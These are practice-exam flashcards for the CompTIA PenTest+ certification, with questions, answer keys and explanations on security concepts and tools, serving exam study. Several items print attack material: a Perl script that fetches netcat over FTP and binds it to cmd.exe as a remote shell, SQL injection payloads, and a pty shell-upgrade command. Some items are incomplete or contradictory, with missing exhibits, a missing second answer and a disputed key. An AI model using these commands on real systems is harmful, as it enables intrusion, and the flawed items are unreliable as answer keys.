CompTIA PenTest+ (PT0-001) Practice Certification Exams (Jason Dion, 3 of 6) Flashcards

1
Q
Your company is setting up a system to accept credit cards in their retail and online locations. Which of the following compliance types should you be MOST concerned with when dealing with credit cards?
A.PCI-DSS
B.GDPR
C.PHI
D.PII
A

A.PCI-DSS

Explanation:
OBJ-1.4: The Payment Card Industry Data Security Standard (PCI DSS) applies to companies of any size that accept credit card payments. If your company intends to accept card payment and store, process, and transmit cardholder data, you need to securely host your data and follow PCI compliance requirements.

2
Q

A firewall technician configures a firewall to allow HTTP traffic as follows:

-=-=-=-=-=-
Source IP Zone Dest IP Zone Port Action
Any Untrust Any DMZ 80 Allow
-=-=-=-=-=-

The organization should upgrade to what technology to prevent unauthorized traffic from traversing the firewall?
A.Application-aware firewall
B.HTTPS
C.Stateless packet inspection
D.Intrusion detection system
A

A.Application-aware firewall

Explanation:
OBJ-5.3: An application-aware firewall can analyze and verify protocols all the way up to layer 7 of the OSI reference model. It has the advantage of being aware of the details in the application layer. Since we want to allow HTTP traffic, we must deal with the traffic at the application layer. This will prevent an attacker from sending SSH traffic over port 80, for example. By using an application-aware firewall, only HTTP traffic will be allowed over port 80.

3
Q
Your organization has been receiving many phishing emails recently, and you are trying to determine why they are effective in getting your users to click on their links. The latest email consists of what looks like an advertisement that is offering an exclusive early access opportunity to buy a new iPhone at a discounted price. Still, there are only 5 phones available at this price. What type of social engineering principle is being exploited here?
A.Trust
B.Familiarity
C.Intimidation
D.Scarcity
A

D.Scarcity

Explanation:
OBJ-3.1: Scarcity is used to create a fear in a person of missing out on a special deal or offer. This technique is used in advertising all the time, such as “supplies are limited,” “only available for the next 4 hours,” and other such artificial limitations.

4
Q
You are performing a web application security test, notice that the site is dynamic, and conclude that it must be using a back-end database. You decide you want to determine if the site is susceptible to a SQL injection. What is the first character that you should attempt to use in breaking a valid SQL request?
A.Exclamation mark
B.Semicolon
C.Single Quote
D.Double Quote
A

C.Single Quote

Explanation:
OBJ-3.4: The single quote character (') is the string delimiter in SQL. With a single quote (') you delimit strings, and therefore you can test whether the programmer has properly escaped the strings in the targeted application. If not escaped directly, you can end any string supplied to the application and add other SQL code after it. This is a common technique for SQL injections. A semicolon is a commonly used character at the end of a line of code or command in many programming languages. An exclamation mark comments a line of code in several languages. Double quotes contain a string that is passed to a variable.

5
Q
Tierra works as a cybersecurity analyst for a large multi-national oil and gas company. She responds to an incident at her company in which their public-facing web server has been defaced with the words, “Killers of the Arctic.” She believes this was done in response to her company’s latest oil drilling project in the Arctic Circle. Which threat actor is most likely to blame for the website defacement?
A.APT
B.Hacktivist
C.Organized Crime
D.Script Kiddie
A

B.Hacktivist

Explanation:
OBJ-1.3: It appears this hack was motivated by a pro-environmentalist agenda based on the message of the website defacement. This is an example of hacktivism. In 2012, five top multi-national oil companies were targeted by members of Anonymous as a form of digital protest against drilling in the Arctic, a practice that these hacktivists believe has contributed to the melting of the ice caps in that region.

6
Q
Dion Training has applied a new Group Policy to all student accounts that will lock out any account in which the student enters their password incorrectly 3 times in a row. Once the account is locked out, the student must wait 15 minutes before they can attempt to log in again. What type of attack is this mitigation strategy trying to prevent?
A.Spoofing
B.Privilege Escalation
C.Brute force attack
D.Man-in-the-middle
A

C.Brute force attack

Explanation:
OBJ-5.3: Since the policy will lock out the student for 15 minutes between attempts, it is a valid mitigation technique against a brute force attack. By extending the waiting period, the attacker’s brute force attempts are less effective.

7
Q
Which of the following is the BEST way to regularly prevent different security threats from occurring within your network?
A.User training and awareness
B.Penetration testing
C.Business Continuity training
D.Disaster Recovery Planning
A

A.User training and awareness

Explanation:
OBJ-5.3: Users are the biggest vulnerability on your network. Therefore, increasing user training can decrease the number of security threats that are realized on your networks. According to industry best practices, you should conduct end-user security awareness training at least annually (if not more frequently).

8
Q

During your reconnaissance, you have determined that your client has devices used to send remote control signals to industrial assets used by their critical infrastructure utilities connected to their corporate network. Which of the following methods would MOST likely be the best method for exploiting these systems?
A.Identify a jailbroken device for easy exploitation
B.Use Metasploit modules designed to target the SCADA systems
C.Use social engineering to trick a user into opening a malicious APK
D.Use a spearphishing campaign to trick a user into installing a RAT

A

B.Use Metasploit modules designed to target the SCADA systems

Explanation:
OBJ-2.5: A penetration tester can exploit supervisory control and data acquisition (SCADA) systems if they are within the engagement’s scope. While Metasploit was initially designed for engagements against workstations and servers, Metasploit has several modules in the exploit/windows/scada category that target vendor-specific SCADA components running Windows. Many of these trigger a buffer overflow, though, so be careful when using them and ensure you have permission to exploit these devices in your written authorization.

9
Q

During a penetration test, you conduct an exploit that creates a denial of service condition by crashing the httpd server. What should you do?
A.Contact the organization's customer service department and conduct further information gathering
B.Immediately contact the organization and inform them of the issue
C.Continue with the exploitation
D.Pivot to another machine

A

B.Immediately contact the organization and inform them of the issue

Explanation:
OBJ-5.4: If at any point during an assessment, an issue arises due to your actions, then you should immediately stop exploitation and contact the trusted point of contact provided by the organization. You should not continue your exploitation or pivot to another machine. While you may contact the organization’s customer service department, you first need to verify if that is part of the allowed communication procedures outlined in the assessment plan. If you are conducting a red team event, the customer service team may be the target and not be informed of the issues directly. As a pentester, you should notify your trusted point of contact within the organization, per your approved test plan.

10
Q
You are working as part of a penetration testing team targeting Dion Training's Linux-based network. You want to determine if you can crack the password on their remote authentication servers. Which of the following tools should you use?
A.Mimikatz
B.W3AF
C.Medusa
D.CeWL
A

C.Medusa

Explanation:
OBJ-4.2: Medusa is a free command-line password cracking tool often used in brute force password attacks on remote authentication servers. W3AF (Web Application Attack and Audit Framework) is a Python tool included in Kali Linux that tries to identify and exploit any web app vulnerabilities. CeWL is a Ruby app that crawls websites to generate word lists for use with other password crackers. Mimikatz is an open-source tool that enables you to view credential information stored on Microsoft Windows computers.

11
Q

You are analyzing a Linux server that you suspect has been tampered with by an attacker. You went to the terminal and typed ‘history’ into the prompt and see the output:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
> echo 127.0.0.1 diontraining.com >> /etc/hosts
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which of the following best describes what actions were performed by this line of code?
A.Added the website to the system's whitelist in the hosts file
B.Routed traffic destined for the localhost to the diontraining.com domain
C.Routed traffic destined for diontraining.com domain to the localhost
D.Attempted to overwrite the hosts file and deleted all data except this entry

A

C.Routed traffic destined for diontraining.com domain to the localhost

Explanation:
OBJ-3.5: Based on the output provided, it appears that the attacker has attempted to route all traffic destined for diontraining.com to the IP address specified (127.0.0.1). This is typically done to prevent a system from communicating with a specific domain or to redirect a host to a malicious site. In this example, the IP/domain name pair of 127.0.0.1 and diontraining.com is being written to the /etc/hosts file. Modifying your hosts file enables you to override the domain name system (DNS) for a domain on a specific machine. The command echo ... >> redirects the output of the content on the left of the >> to the end of the file on the right of the >> symbol. If the > were used instead of >>, then this command would have overwritten the hosts file completely with this entry. The hosts file is not a system whitelist file.

12
Q

During a penetration test, which of the following should you perform if your goal is to conduct a successful spear phishing attack?
A.Send targeted emails with a malicious attachment to the sales team
B.Send a targeted email with a malicious attachment to the organization's CEO
C.Send a test message with a malicious link to the organization's executives
D.Call the CTO's assistant using a pretext to gather information about their schedule

A

A.Send targeted emails with a malicious attachment to the sales team

Explanation:
OBJ-3.1: Spear phishing attacks are crafted to target a specific person or group of people. In this example, you are targeting the sales team with an email. This allows you to create an email that they are more likely to open based on the subject line and its content.

13
Q
Annah is deploying a new application that she received from a vendor, but she is unsure if the hardware is adequate to support a large number of users during peak usage periods. What type of testing could Annah perform to determine if the application will support the required number of users?
A.Regression testing
B.Fuzz testing
C.User acceptance testing
D.Load testing
A

D.Load testing

Explanation:
OBJ-3.2: Load testing or stress testing puts an application, network, or system under full load conditions to document any performance lapses. User Acceptance Testing is the process of verifying that a created solution/software works for a user. Regression testing is defined as software testing to confirm that a recent program or code change has not adversely affected existing features. Fuzz testing, or fuzzing, is a quality assurance technique used to discover coding errors and security loopholes in software, operating systems, or networks. It involves inputting massive amounts of random data to the test subject to make it crash. User acceptance testing, regression testing, and fuzz testing are not designed to test a system under heavy load conditions. Therefore, they will not be suitable for Annah’s needs in this scenario.

14
Q
You have been contracted to perform a remote scan of Dion Training's servers to determine if they comply with the company's software baseline. Which of the following types of scans should you conduct?
A.Stealth scan
B.Discovery scan
C.Compliance scan
D.Full scan
A

C.Compliance scan

Explanation:
OBJ-2.2: Compliance scanning verifies that a network adheres to certain policy requirements, such as a corporate baseline. These policies can be corporate, industry, or governmental regulations. In this scenario, you are asked to verify the servers comply with the company’s software baseline. Therefore, a compliance scan is the best option to select.

15
Q
You are working as part of a DevSecOps team at Dion Training on a new practice exam web application. Which of the following tools should you utilize to scan the web application's database to determine if it is vulnerable to injection flaws?
A.SQLMap
B.Dirbuster
C.Theharvester
D.Kismet
A

A.SQLMap

Explanation:
OBJ-4.2: SQLmap is an open-source database scanner that searches for and exploits SQL injection flaws. This tool is included by default within Kali Linux. Dirbuster, Kismet, and Theharvester are not tools for conducting SQL vulnerability scans. Dirbuster is a brute force tool included with Kali Linux that exposes directories and file names on web and application servers. Kismet is an 802.11 Layer 2 wireless network detector, sniffer, and intrusion detection system included with Kali Linux that monitors wireless activity, identifies device types, and captures raw packets for later password cracking. Theharvester is an open-source intelligence (OSINT) tool that gathers information such as email addresses, subdomains, hostnames, open ports, and banners from publicly available sources.

16
Q

You are analyzing a Python script that isn’t functioning properly. You suspect the issue is with the string manipulation being used in the code. Review the following Python code snippet:

-=-=-=-=-=-
#!/usr/bin/python
s = "DionTraining.com"
print(s[-12:-7])
-=-=-=-=-=-
Based on your analysis, what should be displayed on the screen by the print command?
A.Train
B.nTrai
C.oc..g
D.moc
A

A.Train

Explanation:
OBJ-4.4: When evaluating the code s[-12:-7], you would receive “Train” in response. Within Python, characters in a string can be accessed by their index location. If the string (s) is “DionTraining.com”, then each letter from left to right is referenced as s[0] to s[15]. If you want to reference it from right to left, you simply use a negative number, such as s[-12:-7]. The format for the array is [start:end:increment], so s[-12:-7] is evaluated as starting with the 12th position from the right (T in DionTraining.com), count until it reaches the 7th position from the right, incrementing by the default value of 1 each time. This would display, from the end of the word, the 12th position (T), 11th position (i), 10th position (o), 9th position (i), and 8th position (T), and then stop. Note that when counting positions from the right, you begin counting at 1. When counting from the left, you start with position 0 and work up from there.

17
Q

While conducting a penetration test against an organization, you gained access to the CEO’s account. You log in as the CEO and send the following email:

-=-=-=-=-=-=-
Subject: URGENT - Payment Required

Date: December 3, 2020 12:43 pm

From: “Jason Dion - CEO”
To: “Cristian Santiago - Financial Analyst”
Attachment: WiringInstructions.pdf

Cristian,

Please find the attached wiring instruction for the $15,425 payment to the cloud hosting provider.

This bill is showing as overdue, and payment MUST be transferred today. Please process ASAP.

Thanks,
Jason Dion, CEO
Dion Training Solutions, LLC
-=-=-=-=-=-=-

Which of the following attacks are you utilizing in this scenario?
A.BEC Attack
B.Deauthentication attack
C.Whaling attack
D.Smishing attack
A

A.BEC Attack

Explanation:
OBJ-3.1: A business email compromise (BEC) is a form of elicitation where the attacker impersonates a high-level executive or directly takes over their email account. The attacker then sends an email to elicit personnel to take actions on their behalf. In this example, the attacker is impersonating the company’s CEO by sending an email to the financial personnel requesting they send a money transfer for what appears to be a legitimate service. This example also uses the urgency and authority motivation factors to convince the employee to take action.

18
Q
A malicious user is blocking mobile devices from connecting to the Internet when other people are in the coffee shop. What is the malicious user performing?
A.Spoofing
B.Frequency jamming
C.Blacklisting IP addresses in the ACL
D.Man-in-the-Middle attack
A

B.Frequency jamming

Explanation:
OBJ-3.3: Frequency jamming is one of the many exploits used to compromise a wireless environment. It works by denying service to authorized users, as legitimate traffic is jammed by the overwhelming frequencies of illegitimate traffic. There is no indication that the malicious user is creating a rogue AP (which is a form of spoofing) or performing a MITM attack by having users connect through their laptop or device. Also, there is no mention of certain websites or devices being blocked logically. Therefore, there is no blacklisting of IP addresses being performed.

19
Q
Which of the following is the MOST important thing to receive from the client during the planning for an engagement?
A.Key management policies
B.Storage time for a report
C.Tolerance to impact
D.On-site versus off-site targets
A

C.Tolerance to impact

Explanation:
OBJ-1.3: The client’s tolerance to impact will allow the penetration tester to balance the tasks to be performed in the assessment against real-world network utilization. If the client has a low tolerance to impact, then the assessment may be conducted on a cloned or a sandboxed version of the network or its applications. If the client has a high tolerance to impact, then they understand and agree that the penetration test may have real-world consequences for the production network during the assessment. This is usually based on the organization’s risk appetite.

20
Q
A company has had several virus infections over the past few months. The cause was vulnerabilities in the software applications in use. What should an administrator implement to prevent future outbreaks?
A.Host-based intrusion detection systems
B.Patch management
C.Incident response team
D.Acceptable use policies
A

B.Patch management

Explanation:
OBJ-5.3: Since the viruses exploited known vulnerabilities, there should be patches available from the manufacturer/vendor. Based on this, proper patch management would prevent future outbreaks.

21
Q
Which of the following attacks would most likely be used to create an inadvertent disclosure of information from an organization's database?
A.Cross-site scripting
B.SQL Injection
C.Denial of service
D.Buffer overflow
A

B.SQL Injection

Explanation:
OBJ-3.4: A SQL injection poses the most direct and most impactful threat to an organization’s database. A SQL injection could allow the attacker to execute remote commands on the database server and lead to sensitive information disclosure. A buffer overflow attack attempts to overwrite the memory buffer to send additional data into adjacent memory locations. A buffer overflow attack might target a database server, but it isn’t intended to disclose information directly. Instead, a buffer overflow attack may be used to gain initial access to a server and allow other malicious code to run. A denial of service targets the availability of the information by attempting to take the server offline. A cross-site scripting attack typically is focused on the user, not the server or database.

22
Q
Windows file servers commonly hold sensitive files, databases, passwords, and more. What common vulnerability is usually used against a Windows file server to expose sensitive files, databases, and passwords?
A.SQL Injection
B.Cross-site scripting
C.Missing patches
D.CRLF Injection
A

C.Missing patches

Explanation:
OBJ-2.3: Missing patches are the most common vulnerability found on both Windows and Linux systems. When a security patch is released, attackers begin to reverse engineer the security patch to exploit the vulnerability. If your servers are not patched against the vulnerability, they can become victims of the exploit, and the server’s data can become compromised. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. Cross-site scripting focuses on exploiting a user’s workstation, not a server. CRLF injection is a software application coding vulnerability that occurs when an attacker injects a CRLF character sequence where it is not expected. SQL injection is the placement of malicious code in SQL statements via web page input. SQL injection is commonly used against databases, but it is not useful when attacking file servers.

23
Q
You are conducting a wireless penetration test against an organization. During your reconnaissance, you discover that their network is known as "BigCorpWireless" and has SSID broadcast enabled. You configure your laptop to respond to requests for connection to "BigCorpWireless" and park at the far end of the parking lot. At the end of the workday, as people get in their cars in the parking lot, you see numerous smartphones connecting to your laptop over WiFi. Which of the following exploits did you utilize?
A.Downgrade attack
B.Fragmentation attack
C.Deauthentication attack
D.Karma Attack
A

D.Karma Attack

Explanation:
OBJ-3.3: A karma attack is a variant of the evil twin attack. A karma attack exploits the behavior of a wireless client trying to connect to its preferred network list. This list contains the SSIDs of access points the device has connected to in the past. When a wireless device is looking to connect to the internet, it first beacons to determine if any of these previously connected networks are within range. This allows an attacker to answer the request, allowing the user to connect to them instead as an evil twin. At this point, the attacker is now the man-in-the-middle between the wireless client and the internet, which is useful for many different exploits.

24
Q
You have been contracted by Dion Training to conduct a penetration test against its learning management system (LMS). The LMS is a web application that is hosted in the organization's DMZ. Which of the following appliances should the organization whitelist your source IP in before the engagement begins?
A.NIDS
B.HIDS
C.DLP
D.WAF
A

D.WAF

Explanation:
OBJ-1.3: Whitelisting allows the IP address to be excluded from ACL rules and other signatures. This prevents an active device, like a web application firewall (WAF), layer 4 firewall, or an intrusion prevention system (IPS), from blocking the penetration tester during the assessment. By having your IP added to the whitelist, you can focus your time and efforts on finding vulnerabilities with the servers themselves instead of trying to break through a compensating control like a WAF or IPS.

25
Q
The physical security manager has asked you to assist with his risk assessment of his proposed security measures. He is concerned that during a power outage, the server room might be targeted for attack. Luckily, he has many different protection measures in place to keep intruders out of the server room. During a power outage, which of the following security controls would still be usable?
A.Biometric scanners
B.Door locks
C.Motion detectors
D.CCTV
A

B.Door locks

Explanation:
OBJ-3.6: A traditional door lock doesn’t require power to operate. Therefore, it will still protect the facility and keep the intruder out of the server room. The other options all require power to function and operate.

26
Q

What techniques are commonly used by port and vulnerability scanners to identify the services running on a target system?
A.Banner grabbing and UDP response timing
B.Banner grabbing and comparing response fingerprints
C.Using the -O option in nmap and UDP response timing
D.Comparing response fingerprinting and registry scanning

A

B.Banner grabbing and comparing response fingerprints

Explanation:
OBJ-2.1: Service and version identification are often performed by conducting a banner grab or by checking responses for services to known fingerprints for those services. UDP response timing and other TCP/IP stack fingerprinting techniques are used to identify operating systems only. Using nmap -O will conduct an operating system fingerprint scan, but it will not identify the other services being run.

27
Q
What programming language is most vulnerable to buffer overflow attacks?
A.Swift
B.Python
C.C++
D.Java
A

C.C++

Explanation:
OBJ-3.4: Many memory manipulation functions in C and C++ do not perform bounds checking and can easily overwrite the allocated bounds of the buffers they operate upon. Newer languages like Python, Java, and Swift do a better job of protecting against a buffer overflow, but even they are not perfect.

28
Q

While conducting a static analysis source code review of a program, you see the following line of code:

-=-=-=-=-=-=-
String query = "SELECT * FROM CUSTOMER WHERE CUST_ID='" + request.getParameter("id") + "'";
-=-=-=-=-=-=-

What is the largest security issue with this line of code?
A.The * operator will allow retrieval of every data field about this customer in the CUSTOMER table
B.The code is using parameterized queries
C.A SQL injection could occur because input validation is not being used on the id parameter
D.This code is vulnerable to a buffer overflow attack

A

C.A SQL injection could occur because input validation is not being used on the id parameter

Explanation:
OBJ-5.3: This code takes the input of "id" directly from a user or other program without conducting any input validation. This could be exploited and used as an attack vector for an SQL injection. If a malicious user can alter the id source, it might get replaced with something like ' or '1'='1. This will cause the SQL statement to become: SELECT * FROM CUSTOMER WHERE CUST_ID='' or '1'='1'. Because '1' always equals '1', the WHERE clause will always return true, meaning that EVERY record in the database could now become available to the attacker. When creating SQL statements, there are reasons for and against the use of the * operator. Its presence alone does not necessarily indicate a weakness. With only one line of code being reviewed, you cannot make any statement about whether it is vulnerable to a buffer overflow attack. You do not see the declaration values for the initialization of the id variable. This code is not using parameterized queries, but if it did, then it would eliminate this vulnerability. A parameterized query is a type of output encoding that relies on prepared statements to reduce the risk of an SQL injection.

29
Q

A security analyst is conducting a log review of the company’s web server and finds two suspicious entries:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[12Nov2020 10:07:23] "GET /logon.php?user=test'+oR+7>1%20-- HTTP/1.1" 200 5825
[12Nov2020 10:10:03] "GET /logon.php?user=admin';%20-- HTTP/1.1" 200 5845
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

The analyst contacts the web developer and asks for a copy of the source code to the logon.php script. The script is as follows:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Based on source code analysis, which type of vulnerability is this web server vulnerable to?
A.Command injection
B.Directory traversal
C.LDAP Injection
D.SQL Injection
A

D.SQL Injection

Explanation:
OBJ-3.4: Based on the log entries, it appears the attack was successful in conducting a SQL injection. Notice the escape character (‘) used in the log. A connection to the MySQL database is being used in the script, which could be exploited since no input validation is being performed. Command injection is an attack in which the goal is to execute arbitrary commands on the host operating system via a vulnerable application. SQL injection is a specific type of command injection. LDAP injection is a code injection technique used to exploit web applications that could reveal sensitive user information or modify information represented in the LDAP (Lightweight Directory Access Protocol) data stores. Directory traversal or Path Traversal is an HTTP attack that allows attackers to access restricted directories and execute commands outside of the web server’s root directory.

30
Q

You have been tasked to create some baseline system images to remediate vulnerabilities found in different operating systems. Before any of the images can be deployed, they must be scanned for malware and vulnerabilities. You must ensure the configurations meet industry-standard benchmarks and that the baselining creation process can be repeated frequently. What vulnerability option would BEST create the process requirements to meet the industry-standard benchmarks?
A.Utilizing an operating system SCAP plugin
B.Utilizing a non-credential scan
C.Utilizing an authorized credential scan
D.Utilizing a known malware plugin

A

A.Utilizing an operating system SCAP plugin

Explanation:
OBJ-2.2: Security Content Automation Protocol (SCAP) is a multi-purpose framework of specifications supporting automated configuration, vulnerability and patch checking, technical control compliance activities, and security measurement. It is an industry standard and supports testing for compliance. The other options will not allow for a truly repeatable process since individual scans would occur each time instead of comparing against a known good baseline.

31
Q
What should a vulnerability report include if a cybersecurity analyst wants it to reflect the assets scanned accurately?
A.Organized governance
B.Processor utilization
C.Virtual hosts
D.Log disposition
A

C.Virtual hosts

Explanation:
OBJ-2.2: Vulnerability reports should include both the physical hosts and the virtual hosts on the target network. A common mistake of new cybersecurity analysts is to include only the physical hosts, thereby missing many network assets.

32
Q
Which of the following types of encryption would ensure the best security of a website?
A.TLS
B.SSLv1
C.SSLv3
D.SSLv2
A

A.TLS

Explanation:
OBJ-5.3: Transport Layer Security (TLS) is a widely adopted security protocol designed to facilitate privacy and data security for communications over the internet. A primary use case of TLS is encrypting the communication between web applications and servers, such as web browsers loading a website. TLS was developed in 1999 as SSLv3.1, but its name was changed to separate itself from Netscape, which developed the original SSL protocol. Because of this history, the terms TLS and SSL are often used interchangeably. Secure Socket Layer has three versions: SSLv1, SSLv2, and SSLv3. All of these versions of SSL are considered obsolete and insecure.

33
Q

You are analyzing the vulnerability scanning results from a recent web vulnerability scan in preparation for the exploitation phase of an upcoming assessment. A portion of the scan results is shown below.
Which exploit is the website vulnerable to based on the results?
A.Cookie manipulation
B.SQL Injection
C.Local file inclusion
D.XSS

A

D.XSS

Explanation:
OBJ-2.3: Cross-site scripting exploits a vulnerability in which a malicious script is injected into a trusted website and then downloaded and executed by a user's browser. In this scan result, you can see that the parameter for the name that was posted included some JavaScript (onload, this.src). This result shows that this site is vulnerable to a cross-site scripting attack.

34
Q

You are working as part of a penetration testing team targeting Dion Training’s webserver. You want to determine if you can expose any directories or file names on the webserver. Which of the following tools should you use?

A.Mimikatz
B.Dirbuster
C.IDA
D.CeWL

A

B.Dirbuster

Explanation:
OBJ-4.2: Dirbuster uses brute force to expose directories and file names on web and application servers. CeWL is a ruby app that crawls websites to generate word lists for use with other password crackers. Mimikatz is an open-source tool that enables you to view credential information stored on Microsoft Windows computers. IDA (Interactive Disassembler) is a reverse-engineering tool that generates source code from machine code for Windows, Mac OS X, and Linux applications.

35
Q

Tamera is conducting a penetration test of Dion Training’s network. She just successfully exploited a Linux server and then entered the following command:

-=-=-=-=-=-
python -c 'import pty; pty.spawn("/bin/bash")'
-=-=-=-=-=-

Which of the following techniques is Tamera utilizing?
A.Creating a scheduled task
B.Credential harvesting
C.Shell upgrade
D.Erasing shell history
A

C.Shell upgrade

Explanation:
OBJ-3.5: When running an exploit, sometimes you don't receive a fully interactive shell in return. If you receive a "dumb shell", you can use Python to spawn a pty. A pty is a pseudo-terminal utility that is built into Python and only works on Linux systems. From here, you can attempt a privilege escalation using su and other commands on the system.

36
Q

A penetration tester is conducting software assurance testing on a web application for Dion Training. You discover the web application is vulnerable to an SQL injection and could disclose a regular user’s password. Which of the following actions should you perform?
A.Document the finding with an executive summary, methodology used, and a remediation recommendation
B.Contact the development team directly and recommend adding input validation to the web application
C.Recommend that the company conduct a full penetration test of their systems to identify other vulnerabilities
D.Conduct a proof-of-concept exploit on three user accounts at random and document this in your report

A

A.Document the finding with an executive summary, methodology used, and a remediation recommendation (This is potentially not true, as a SQL injection is considered critical; therefore you should contact the point of contact in the communication escalation path)

Explanation:
OBJ-5.1: When you find a vulnerability, it should be documented fully. This includes providing an executive summary for management, the methodology used to find the vulnerability so that others can recreate and verify it, and the recommended remediation actions that should be taken. You should not exploit three random accounts on the server, which could negatively impact the client's reputation. You should not contact the development team directly since they may ignore your recommendation, and they did not hire you. While it may be a good idea to conduct a full-scale penetration test, that would not necessarily solve this vulnerability.

37
Q

Ryan needs to verify the installation of a critical Windows patch on his organization’s workstations. Which method would be the most efficient to validate the current patch status for all of the organization’s Windows 10 workstations?
A.Create and run a PowerShell script to search for the specific patch in question
B.Check the update history manually
C.Conduct a registry scan of each workstation to validate the patch was installed
D.Use SCCM to validate patch status for each machine on the domain

A

D.Use SCCM to validate patch status for each machine on the domain

Explanation:
OBJ-5.3: The Microsoft System Center Configuration Manager (SCCM) provides remote control, patch management, software distribution, operating system deployment, network access protection, and hardware and software inventory. In an Azure environment, you can also use the Update Compliance tool to monitor your devices' Windows updates, Windows Defender anti-virus status, and the up-to-date patching status across all of your Windows 10 workstations. In previous Windows versions, you could use the Microsoft Baseline Analyzer (MSBA), but that is no longer supported since Windows 10 was introduced. A PowerShell script may be a reasonable option, but it would take a knowledgeable analyst to create the script and scan the network, whereas using SCCM is easier and quicker. Manually checking the Update History or registry of each system could also work, but that is very time consuming and inefficient, especially if Ryan is supporting a large network.

38
Q
Which of the following types of information is protected by rules in the United States that specify the minimum frequency of vulnerability scanning required for devices that process it?
A.Insurance records
B.Credit card data
C.Medical records
D.Drivers license numbers
A

B.Credit card data

Explanation:
OBJ-1.4: The Payment Card Industry Data Security Standard is an information security standard for organizations that handle branded credit cards from the major card schemes. The PCI Standard is mandated by the card brands but administered by the Payment Card Industry Security Standards Council. As part of PCI DSS compliance, organizations must conduct internal and external scans at prescribed intervals on any devices or systems that process credit card data. HIPAA protects medical and insurance records, but this law doesn't define a frequency for vulnerability scanning requirements. Driver's license numbers are considered PII, but again, there is no defined frequency scanning requirement regarding protecting PII under law, regulation, or rule.

39
Q
Which file on a Linux system is modified to set the maximum number of days before a password must be changed?
A./etc/shadow
B./etc/users
C./etc/groups
D./etc/passwd
A

A./etc/shadow

Explanation:
OBJ-3.5: The /etc/shadow file stores the actual password in an encrypted format (more like the hash of the password) for the user’s account with additional properties related to the user password. Basically, it stores secure user account information. All fields are separated by a colon (:) symbol. It contains one entry per line for each user listed in the /etc/passwd file. The last 6 fields provide password aging and account lockout features.

40
Q
Your organization is preparing for its required quarterly PCI DSS external vulnerability scan. Who is authorized to perform this scan?
A.Only employees of the company
B.Only an approved scanning vendor
C.Any qualified individual
D.Anyone
A

B.Only an approved scanning vendor

Explanation:
OBJ-1.4: The Payment Card Industry Data Security Standard (PCI DSS) is a prescriptive framework. It is not a law but a formal policy created by the credit card industry that organizations must follow to accept credit and bank cards for payment. Quarterly required external vulnerability scans must be run by a PCI DSS approved scanning vendor (ASV). This question may seem beyond the scope of the exam. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s content. Therefore, questions like this are fair game on test day. That said, your goal isn’t to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess and move on!

41
Q
What nmap switch would you use to perform operating system detection?
A.-OS
B.-s0
C.-O
D.-sP
A

C.-O

Explanation:
OBJ-4.1: The -O switch is used to tell nmap to conduct fingerprinting of the operating system based on the responses received during scanning. Nmap will then report on the suspected operating system of the scanned host. If you use -O -v, you will get additional details, as this runs the operating system scan in verbose mode. The -OS flag is made up and not supported by nmap. The -s0 flag conducts an IP protocol scan of the target. The -sP flag conducts a simple ping scan against the target.

42
Q
A company-wide audit revealed employees are using company laptops and desktops for personal use. To prevent this from occurring, in which document should the company incorporate the phrase “Company-owned IT assets are to be used to perform authorized company business only"?
A.MOU
B.AUP
C.SLA
D.MSA
A

B.AUP

Explanation:
OBJ-1.2: An Acceptable Use Policy (AUP) dictates what types of actions an employee can or cannot do with company-issued IT equipment.

43
Q

A penetration tester discovered a web server running IIS 4.0 during their enumeration phase. The tester decided to use the msadc.pl attack script to execute arbitrary commands on the webserver. While the msadc.pl script is effective, the pentester found it too monotonous to use for extended functions. During further research, the penetration tester found a Perl script that runs the following msadc commands:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# Build an FTP command file on the target one line at a time via msadc.pl
system("perl msadc.pl -h $host -C \"echo $user>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>tempfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>tempfile\"");
# Run the FTP client against that command file to fetch the files
system("perl msadc.pl -h $host -C \"ftp -s:tempfile\"");
$o=<STDIN>; print "Opening FTP connection...\n";
# Start netcat as a listener bound to cmd.exe
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which exploit type is indicated by this script?
A.SQL Injection Exploit
B.Denial of Service exploit
C.Chained exploit
D.Buffer overflow exploit
A

C.Chained exploit

Explanation:
OBJ-2.4: The script is an example of a chained exploit because it combines several programs into one, including writing to a temporary file, netcat usage, and FTP usage. Chained exploits integrate more than one form of attack to accomplish their goal. A buffer overflow is an anomaly that occurs when a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory locations. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to a malicious cyber threat actor's actions.

44
Q

Tamera just purchased a Wi-Fi-enabled Nest Thermostat for her home. She has hired you to install it, but she is worried about a hacker breaking into the thermostat since it is an IoT device. Which of the following is the BEST thing to do to mitigate Tamera’s security concerns? (Select TWO)
A.Configure the thermostat to connect to the wireless network using WPA2 encryption and a long strong password
B.Disable wireless connectivity to the thermostat to ensure a hacker cannot access it
C.Configure the thermostat to use a segregated part of the network by installing it into a DMZ
D.Enable two-factor authentication on the device's website (if supported by the company)
E.Upgrade the firmware of the wireless access point to the latest version to improve the security of the network

A

A.Configure the thermostat to connect to the wireless network using WPA2 encryption and a long strong password
